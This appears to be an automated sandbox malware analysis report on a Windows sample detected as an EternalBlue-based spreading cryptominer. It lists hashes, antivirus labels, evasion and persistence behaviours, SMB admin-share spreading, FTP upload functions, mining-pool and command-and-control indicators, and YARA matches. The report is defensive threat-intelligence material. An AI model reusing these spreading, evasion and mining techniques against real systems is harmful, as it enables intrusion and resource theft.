Windows Analysis Report
SecuriteInfo.com.Variant.Mikey.113879.32606.1960

Overview

General Information

Sample Name: SecuriteInfo.com.Variant.Mikey.113879.32606.1960 (renamed file extension from 1960 to exe)
Analysis ID: 611061
MD5: cc978b9f6e2f667d7f02eb94f868e34c
SHA1: 636f5d95ac54d2346f8d43d436ac62b74e72baca
SHA256: 7c8f444757a013aa7fd3578a16842d19e7e9d7828aa47c3ce2032ee58cd4b8c4
Tags: exe
Infos:

Detection

ETERNALBLUE
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for dropped file
Yara detected ETERNALBLUE
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Sigma detected: Xmrig
Submitted sample is a known malware sample
Found stalling execution ending in API Sleep call
Found strings related to Crypto-Mining
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Sigma detected: Windows Crypto Mining Indicators
Contains functionality to enumerate network shares of other devices
Machine Learning detection for dropped file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to upload files via FTP
Enables debug privileges
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Enables security privileges
Uses taskkill to terminate processes
Found evaded block containing many API calls
Contains functionality to query network adapater information
Sigma detected: Autorun Keys Modification

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: C:\ProgramData\libcurl.dll Avira: detection malicious, Label: EXP/Equation.G
Source: C:\ProgramData\adfw.dll Avira: detection malicious, Label: TR/ShadowBrokers.gpoeb
Source: C:\ProgramData\coli-0.dll Avira: detection malicious, Label: TR/Agent.mewnz
Source: C:\ProgramData\eteb-2.dll Avira: detection malicious, Label: TR/ShadowBrokers.asogb
Source: C:\ProgramData\dmgd-1.dll Avira: detection malicious, Label: TR/ShadowBrokers.dvwub
Source: C:\ProgramData\etebCore-2.x64.dll Avira: detection malicious, Label: TR/ShadowBrokers.WJ
Source: C:\ProgramData\cywkjq.exe Avira: detection malicious, Label: HEUR/AGEN.1213003
Source: C:\ProgramData\pcrecpp-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.nphvl
Source: C:\ProgramData\cnli-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.xbdrs
Source: C:\ProgramData\pcreposix-0.dll Avira: detection malicious, Label: TR/Equation.E
Source: C:\ProgramData\libxml2.dll Avira: detection malicious, Label: TR/Eqtonex.hjsmv
Source: C:\ProgramData\dmgd-4.dll Avira: detection malicious, Label: TR/ShadowBrokers.gzfza
Source: C:\ProgramData\esco-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.pzirk
Source: C:\ProgramData\etchCore-0.x64.dll Avira: detection malicious, Label: TR/ShadowBrokers.A
Source: C:\ProgramData\etchCore-0.x86.dll Avira: detection malicious, Label: TR/ShadowBrokers.djauj
Source: C:\ProgramData\crli-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.xvdds
Source: C:\ProgramData\adfw-2.dll Avira: detection malicious, Label: TR/ShadowBrokers.bhlos
Source: C:\ProgramData\iconv.dll Avira: detection malicious, Label: TR/Equation.B
Source: C:\ProgramData\libiconv-2.dll Avira: detection malicious, Label: TR/Eqtonex.lckrg
Source: C:\ProgramData\posh-0.dll Avira: detection malicious, Label: TR/Eqtonex.qkzfk
Source: C:\ProgramData\pcre-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.gyswu
Source: C:\ProgramData\exma.dll Avira: detection malicious, Label: TR/ShadowBrokers.qdbcu
Source: C:\ProgramData\X64.dll Avira: detection malicious, Label: HEUR/AGEN.1229839
Source: C:\ProgramData\etebCore-2.x86.dll Avira: detection malicious, Label: EXP/Agent.asbdu
Source: C:\ProgramData\cnli-1.dll Avira: detection malicious, Label: EXP/Equation.H
Source: C:\ProgramData\libeay32.dll Avira: detection malicious, Label: TR/Agent.xdwkx
Source: C:\ProgramData\SMB.exe Avira: detection malicious, Label: TR/AD.DPulsarShellcode.sogzc
Source: C:\ProgramData\pcla-0.dll Avira: detection malicious, Label: TR/ShadowBrokers.lnsou
Source: C:\ProgramData\etch-0.dll Avira: detection malicious, Label: TR/Eqtonex.ergta
Source: C:\ProgramData\exma-1.dll Avira: detection malicious, Label: TR/Equation.DC
Source: C:\ProgramData\X86.dll Avira: detection malicious, Label: TR/Dldr.Agent.kapyv
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Avira: detected
Source: C:\ProgramData\SMB.exe Metadefender: Detection: 21% Perma Link
Source: C:\ProgramData\SMB.exe ReversingLabs: Detection: 79%
Source: C:\ProgramData\X64.dll Metadefender: Detection: 43% Perma Link
Source: C:\ProgramData\X64.dll ReversingLabs: Detection: 65%
Source: C:\ProgramData\X86.dll Metadefender: Detection: 48% Perma Link
Source: C:\ProgramData\X86.dll ReversingLabs: Detection: 81%
Source: C:\ProgramData\adfw-2.dll Metadefender: Detection: 80% Perma Link
Source: C:\ProgramData\adfw-2.dll ReversingLabs: Detection: 96%
Source: C:\ProgramData\adfw.dll Metadefender: Detection: 68% Perma Link
Source: C:\ProgramData\adfw.dll ReversingLabs: Detection: 89%
Source: C:\ProgramData\cnli-0.dll Metadefender: Detection: 71% Perma Link
Source: C:\ProgramData\cnli-0.dll ReversingLabs: Detection: 92%
Source: C:\ProgramData\cnli-1.dll Metadefender: Detection: 71% Perma Link
Source: C:\ProgramData\cnli-1.dll ReversingLabs: Detection: 96%
Source: C:\ProgramData\coli-0.dll Metadefender: Detection: 80% Perma Link
Source: C:\ProgramData\coli-0.dll ReversingLabs: Detection: 96%
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Joe Sandbox ML: detected
Source: C:\ProgramData\eteb-2.dll Joe Sandbox ML: detected
Source: C:\ProgramData\etebCore-2.x64.dll Joe Sandbox ML: detected
Source: C:\ProgramData\cywkjq.exe Joe Sandbox ML: detected
Source: C:\ProgramData\dmgd-4.dll Joe Sandbox ML: detected
Source: C:\ProgramData\etebCore-2.x86.dll Joe Sandbox ML: detected
Source: C:\ProgramData\SMB.exe Joe Sandbox ML: detected
Source: C:\ProgramData\X86.dll Joe Sandbox ML: detected

Exploits

barindex
Source: Yara match File source: C:\ProgramData\eteb-2.dll, type: DROPPED
Source: Yara match File source: C:\ProgramData\svchostlong.exe, type: DROPPED

Bitcoin Miner

barindex
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe String found in binary or memory: stratum+tcp://
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe String found in binary or memory: stratum+tcp://
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SMB.exe, 00000025.00000002.334719426.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000025.00000000.283876071.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000000.301017387.0000000001350000.00000002.00000001.01000000.00000005.sdmp, SMB.exe, 00000040.00000002.604463756.0000000001350000.00000002.00000001.01000000.00000005.sdmp

Spreading

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00403A10 wsprintfA,WNetAddConnection2A,GetModuleFileNameA,wsprintfA,CopyFileA,wsprintfA,wsprintfA,CopyFileA,wsprintfA,WinExec,CopyFileA,SetFileAttributesA,CopyFileA,SetFileAttributesA,WNetCancelConnection2A, \\%s\admin$\spread.exe 0_2_00403A10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004054A0 GetModuleFileNameA,GetLogicalDriveStringsA,GetDriveTypeA,CreateThread,CloseHandle,Sleep, 0_2_004054A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00404F50 FindFirstFileA,lstrcmpiA,StrStrIA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Sleep,FindNextFileA,FindClose, 0_2_00404F50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00435442 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen, 0_2_00435442
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_004055E0 _fwprintf,FindFirstFileA,wsprintfA,wsprintfA,Sleep,MoveFileExA,Sleep,SetFileAttributesA,_fwprintf,FindNextFileA,FindClose, 0_2_004055E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042EB4F __EH_prolog3,_strlen,__cftof,FtpFindFirstFileA,FtpSetCurrentDirectoryA,FtpSetCurrentDirectoryA, 0_2_0042EB4F
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132A2C3 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 37_2_0132A2C3
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133A536 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 37_2_0133A536
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347D69 FindFirstFileExA, 37_2_01347D69
Source: C:\ProgramData\SMB.exe Code function: 37_2_01347E6F FindFirstFileExA,FindClose, 37_2_01347E6F

Networking

barindex
Source: Traffic Snort IDS: 2831812 ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) 192.168.2.3:49767 -> 5.161.50.27:19999
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042FBC5 FtpPutFileA, 0_2_0042FBC5
Source: global traffic TCP traffic: 192.168.2.3:49733 -> 119.91.92.254:3171
Source: spread.txt.0.dr String found in binary or memory: http://%s:%d/spread.txt
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, 00000000.00000002.336119364.000000000075C000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://192.168.2.3:19490/spread.txt
Source: libcurl.dll.37.dr String found in binary or memory: http://curl.haxx.se/V
Source: libcurl.dll.37.dr String found in binary or memory: http://curl.haxx.se/docs/copyright.htmlD
Source: libcurl.dll.37.dr String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: libxml2.dll.37.dr String found in binary or memory: http://purl.oclc.org/dsdl/schematron
Source: libxml2.dll.37.dr String found in binary or memory: http://relaxng.org/ns/structure/1.0
Source: libxml2.dll.37.dr String found in binary or memory: http://relaxng.org/ns/structure/1.0allocating
Source: libxml2.dll.37.dr String found in binary or memory: http://www.ascc.net/xml/schematron
Source: libxml2.dll.37.dr String found in binary or memory: http://www.ascc.net/xml/schematronhttp://purl.oclc.org/dsdl/schematronallocating
Source: spread.txt.0.dr String found in binary or memory: http://www.baidu.com/search/spider.html
Source: spread.txt.0.dr String found in binary or memory: http://www.baidu.com/search/spider.html)
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: http://www.baidu.com/search/spider.html)95.179.220.100Windows
Source: svchost.exe, 00000044.00000002.326835660.00000232F3C13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: libxml2.dll.37.dr String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd
Source: libxml2.dll.37.dr String found in binary or memory: http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtdConverting
Source: spread.txt.0.dr String found in binary or memory: http://www.yzzswt.com
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: http://www.yzzswt.comcmd
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: http://www.yzzswt.comiexplore.exeopenWelcome
Source: zlib1.dll.37.dr String found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.comt
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000034.00000002.604100531.000001D432E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000044.00000003.326350081.00000232F3C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326953934.00000232F3C6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000044.00000003.326397018.00000232F3C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326913792.00000232F3C4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000044.00000002.326932605.00000232F3C5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000044.00000002.326932605.00000232F3C5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000044.00000002.326932605.00000232F3C5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000044.00000002.326913792.00000232F3C4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326408152.00000232F3C5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000044.00000003.326379431.00000232F3C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, spread.txt.0.dr String found in binary or memory: https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326835660.00000232F3C13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000044.00000003.326440319.00000232F3C57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000044.00000003.326440319.00000232F3C57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000044.00000002.326881520.00000232F3C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000044.00000002.326901499.00000232F3C43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000003.326446529.00000232F3C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000044.00000003.326397018.00000232F3C47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000044.00000002.326913792.00000232F3C4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: unknown DNS traffic detected: queries for: caiyundf.cn
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0042CA50 socket,htons,inet_addr,connect,wsprintfA,send,recv,closesocket, 0_2_0042CA50

System Summary

barindex
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe, type: SAMPLE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 11.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 66.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 11.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 36.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 66.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 65.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 65.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 36.2.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 0.0.SecuriteInfo.com.Variant.Mikey.113879.32606.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000024.00000002.284640590.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 0000000B.00000000.261054855.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000000.00000000.246392472.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000041.00000000.301932792.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000042.00000000.306247565.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000024.00000000.282865261.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000000.00000002.335862211.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000042.00000002.335587217.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 0000000B.00000002.271006999.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: 00000041.00000002.307114937.00000000006BA000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 2480, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4140, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6760, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 6612, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: Process Memory Space: SecuriteInfo.com.Variant.Mikey.113879.32606.exe PID: 4204, type: MEMORYSTR Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\coli-0.dll, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\svchostromance.exe, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\svchostlong.xml, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\svchostromance.xml, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\etchCore-0.x64.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\svchostlong.exe, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\etchCore-0.x86.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\zibe.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\serverlong.xml, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
Source: C:\ProgramData\etch-0.dll, type: DROPPED Matched rule: Detects EquationGroup Tool - April Leak Author: Florian Roth
Source: C:\ProgramData\spread.txt, type: DROPPED Matched rule: Detects Windows executables containing EternalBlue explitation artifacts Author: ditekSHen
